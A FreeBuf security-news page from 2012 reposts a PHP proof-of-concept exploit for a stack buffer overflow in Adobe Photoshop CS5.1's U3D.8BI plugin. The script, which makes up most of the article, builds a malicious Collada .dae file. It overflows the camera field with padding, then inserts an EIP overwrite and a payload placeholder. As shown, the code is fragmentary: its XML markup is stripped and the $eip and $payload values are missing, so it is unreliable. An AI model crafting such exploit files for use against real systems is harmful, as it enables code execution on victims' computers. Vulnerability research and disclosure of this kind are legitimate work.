freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
FreeBuf+小程序

FreeBuf+小程序

官方公众号企业安全新浪微博

国内领先的互联网安全新媒体,同时也是爱好者们交流与分享安全技术的社区

Adobe Photoshop CS5.1 U3D.8BI Buffer Overflow
2012-05-13 15:03:52

*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。

小编注:Adobe公司旗下的Photoshop CS5.1近日被发现基于堆栈的缓冲区溢出漏洞。目前最新版本为photoshop cs6,于2012年4月24日发布。在最新版本未发现该漏洞。但是现在用cs5.1的还是非常多。 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 测试方法:
'.
       ''.
       '    '.
       '    '.
       '    rgod'.
       '    Maya 8.0 | ColladaMaya v3.02 | FCollada v3.2'.
       '    Collada Maya Export Options: bakeTransforms=0;exportPolygonMeshes=1;bakeLighting=0;isSampling=0;'.
       '      curveConstrainSampling=0;exportCameraAsLookat=0;'.
       '      exportLights=1;exportCameras=1;exportJointsAndSkin=1;'.
       '      exportAnimations=1;exportTriangles=1;exportInvisibleNodes=0;'.
       '      exportNormals=1;exportTexCoords=1;exportVertexColors=1;exportTangents=0;'.
       '      exportTexTangents=0;exportConstraints=1;exportPhysics=0;exportXRefs=1;'.
       '      dereferenceXRefs=0;cameraXFov=0;'.
       str_repeat("A",170).
       'cameraYFov=1;'.
       str_repeat("a",100).
       str_repeat("b",100).
       str_repeat("c",100).
       str_repeat("d",100).
       str_repeat("e",100).
       str_repeat("f",100).
       str_repeat("g",100).
       str_repeat("h",100).
       str_repeat("i",100).
       str_repeat("j",100).
       str_repeat("k",100).
       str_repeat("l",100).
       str_repeat("m",100).
        str_repeat("n",100).
"aaaabbbA".
$eip.
"ccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrssssttttuuuuvvvvwwwwxxxxyyyy".
       '    '.
       ''.
       $payload.
       ''.
       '    '.
       '      Copyright 2012 rgod Computer Entertainment Inc.'.
       '    '.
       '    file:///C:/vs2005/sample_data/untitled'.
       '    '.
       '    2008-04-24T22:29:59Z'.
       '    2099-02-21T22:52:44Z'.
       '    '.
       '    Y_UP'.
       '  '.
       '';
file_put_contents("photoshop_sample.dae",$_xml);
echo "done";
?>
下载地址 via:sebug.net

本文作者:, 转载请注明来自FreeBuf.COM

# 漏洞 # photoshop漏洞
被以下专栏收录,发现更多精彩内容
+ 收入我的专栏
评论 按时间排序

登录/注册后在FreeBuf发布内容哦

相关推荐
  • 0 文章数
  • 0 评论数
  • 0 关注者
登录 / 注册后在FreeBuf发布内容哦